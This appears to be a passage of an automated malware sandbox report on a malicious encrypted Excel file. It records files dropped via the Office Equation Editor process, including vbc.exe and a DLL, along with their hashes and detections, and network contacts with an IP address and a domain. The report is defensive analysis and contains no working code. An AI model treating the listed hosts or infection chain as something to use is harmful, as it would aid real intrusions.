Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6411295525044179
Encrypted:	false
SSDEEP:	384:kXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:WXwBkNWZ3cjvmWa+VDO
MD5:	E13FB0CF12ACB0DE77343AA8E634CE46
SHA1:	D34081BD6861817968A03A3EAB06B3779B5F4289
SHA-256:	8A8CA6BB15367EFC9FD076DFB139ADAC8C250E7019AED4DF21B823C827B82D50
SHA-512:	95094ED249C649C4D4679E27345EA0FA5934C1D64E641FCDD22A611753052AB8B5BA674CB41DEA6A3D80DCB0118B610EA83109800122FCCF57EF652C6C6E8219
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................NZ$...../..fXZ.@-.%...../. ./......./.../.RQ.[../.\|./......./.h./.$Q.[../.\|./. ...IdXZ\|./.../. ............dXZ............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...\|./.../..8PZ........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2A0EB17.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED8DC3D.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE39EA45.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:	1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5161A2C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FADACEE0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Temp\5xppu3pv9xau06i1l7h Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	215509
Entropy (8bit):	7.993007159667604
Encrypted:	true
SSDEEP:	6144:hKN+7tjT1EoU/usg+EyYhHSP57+UsvQv3QjQhClksFCvB:CitHGhGsg+EpxY+UsYSkvB
MD5:	09E26957074F7239C0B27A193FD6CAD9
SHA1:	91B1CC7594C2800DA6A3FBEFB374DBEFC0B61869
SHA-256:	E8AC32511C468DB2F12B50DDE50345166EA845907E661091F2E64FA1EBE0D783
SHA-512:	A0408E836B50A0E7EFE1A1BC0D2A521275A37B25C7A72EDEBFA07EBBD7A453D90BBE7D28DFE3D7A7AC88D3E3A57E030E4986DC43DF378851BDED16D80BF9C55B
Malicious:	false
Preview:	".u.So.r..SD..9....t.R.f&7.......e.....%c...2....,..........NQ.~.!..ej.f....0.K.v.j.......:(1P.Us...dB.#.].&d0..J.I....%...xg..S...(.a.#.. .k/..Up.).N5.d...]..4.$"....f...%W.....{.'...o..Qd....M.....7.^.... }..5..$..g.w.A..y .P5..a.\|."...v......o.r...r)]..... T.@./.C.....ea....%c...2....,.........N...~!.t....s..3...?......0.[..k}.O.+.....p...W3...ka\|.I....%..Zz..}.........\Dx...h......dw.....o. ...P`6.>~.&+.%W.v.....'.."..Qd....d..xQjV..z.;. }..5..T..l.w....y`.P8..a8\|.N"....v...b..o.r.5~.rI].....7T...p.C.....e.....%c...2....,.........N...~!.t....s..3...?......0.[..k}.O.+.....p...W3...ka\|.I....%..Zz..}.........\Dx...h......dw.....o. ...P`6..f...%W. .....'..c"..Qd....d..xQjV.^z... }..5..T..l.w....y`.P8..a8\|.N"....v...b..o.r.5~.rI].....7T...p.C.....e.....%c...2....,.........N...~!.t....s..3...?......0.[..k}.O.+.....p...W3...ka\|.I....%..Zz..}.........\Dx...h......dw.....o. ...P`6..f*...%W. .....'..c"..Qd....d..xQjV.^z... }..5..T..l.w

C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	108032
Entropy (8bit):	6.399774938239077
Encrypted:	false
SSDEEP:	1536:MOFgGAexpLuHJsu05OpmubCPMG9zpEENfuJSPRHKarriUCy3WklS9ncobUfs/MdL:hFgGA8uq9Bn1bJCyxlSrbMdyqWU
MD5:	9DCFA8231F1896CA0D48D53FB116841D
SHA1:	13F92A4AF7931B2AABD918D6D3CF4589E316331B
SHA-256:	6E1D37A9909F1774DB945F4427800E4D0B821FDCA41598F12DBA41B59FA3C901
SHA-512:	75D3A9FF265971C659444BD13FC28F90A77E0CE709A34A6C46F9EC75FD7F337DF5DBF5EC74B4129890B4B724E40AA10863F6D8D7E74A747CE7C5311F97513D09
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: dtMT5xGa54.exe, Detection: malicious, Browse Filename: TransportLabel_1189160070.xlsx, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....wfa...........!....."...........*..............................................................................<...L...........................................................................h]..H...........p... ............................text....!.......".................. ..`.rdata...V...@...X...&..............@..@.data....C.......&...~..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	290617
Entropy (8bit):	7.9395134807721
Encrypted:	false
SSDEEP:	6144:wBlL/c7HU+ICkZsFE03JDT37iHxU1D/RmNOZeXBiFkJTstHJXd0mU:Ce7HUDCysO0dLiWDc8ZHKmHImU
MD5:	0031A23B4BB6ABCDCCC5F8122DE5FCB5
SHA1:	BE50CDBB0AF4C77229E3DE0EC7F34088AAE64DC2
SHA-256:	2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
SHA-512:	EED60BDA2D0A5FB02F823DB8CAF57D136DC6D003F49CA7D3CB6A620DCB1CF4AD4E52C6B9A40AEFE9126F9E137776AE23D78A2648F5609FA3D69989AB3D185CC2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Joe Sandbox View:	Filename: TransportLabel_1189160070.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..\|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.9731887479499495
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Sajeeb09908976745344567.xlsx
File size:	328616
MD5:	ac493c2681477e3b56acbb570b8e41d9
SHA1:	2d9019b6c2f57c6360b155957cb542ae61bbf728
SHA256:	9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
SHA512:	a26f5e7baebdf77f54a9e8f1b109b4a9ac2ed74f33fca08f4014b1e185e87d446d2638dd4dff3ec67f229df3ad0bb592549e999851ea75fbd864e3c1df0fe024
SSDEEP:	6144:nPUVRB6666666rBkkoL6666664BoW303lddzlBGJOvZT7oz7Dqfd2QCwHPPQRUk2:PqH666666eBkxL6666664BoWE3lPcGZb
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 19:03:15.477302074 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:15.650738955 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:15.651010036 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:15.651736975 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:15.826574087 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:15.826603889 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:15.826620102 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:15.826637030 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:15.826730013 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:15.826781988 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.003546000 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003576994 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003595114 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003611088 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003627062 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003642082 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003657103 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003671885 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.003727913 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.003760099 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177303076 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177356005 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177369118 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177386045 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177397966 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177409887 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177424908 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177438021 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177526951 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177545071 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177556992 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177573919 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177587986 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177607059 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177623034 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177639008 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.177644014 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177695990 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177700996 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177704096 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177706957 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177710056 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.177712917 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.180073977 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.351347923 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351380110 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351392031 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351404905 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351421118 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351432085 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351444006 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351464987 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351476908 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351490021 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351500988 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351521015 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351533890 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351543903 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351560116 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351576090 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351592064 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351603985 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351615906 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351627111 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351639032 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351655006 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351666927 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351670027 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.351679087 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351691008 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351705074 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351707935 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.351715088 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.351716995 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351728916 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351744890 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351759911 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.351769924 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.351783037 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.351883888 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.354324102 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.525357962 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525402069 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525430918 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525460958 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525487900 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525513887 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525540113 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525566101 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525592089 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525639057 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525664091 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.525667906 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525695086 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525715113 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.525721073 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.525722027 CEST	80	49165	192.3.110.172	192.168.2.22
Oct 13, 2021 19:03:16.525724888 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.525743961 CEST	49165	80	192.168.2.22	192.3.110.172
Oct 13, 2021 19:03:16.525747061 CEST	49165	80	192.168.2.22	192.3.110.172

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 19:04:37.338116884 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 13, 2021 19:04:37.364202976 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 13, 2021 19:04:58.681433916 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 19:04:58.704255104 CEST	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 19:04:37.338116884 CEST	192.168.2.22	8.8.8.8	0xc18c	Standard query (0)	www.washingtonboatrentals.com	A (IP address)	IN (0x0001)
Oct 13, 2021 19:04:58.681433916 CEST	192.168.2.22	8.8.8.8	0xd191	Standard query (0)	www.washingtonboatrentals.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 19:04:37.364202976 CEST	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.washingtonboatrentals.com		3.64.163.50	A (IP address)	IN (0x0001)
Oct 13, 2021 19:04:58.704255104 CEST	8.8.8.8	192.168.2.22	0xd191	No error (0)	www.washingtonboatrentals.com		3.64.163.50	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

192.3.110.172

www.washingtonboatrentals.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	192.3.110.172	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
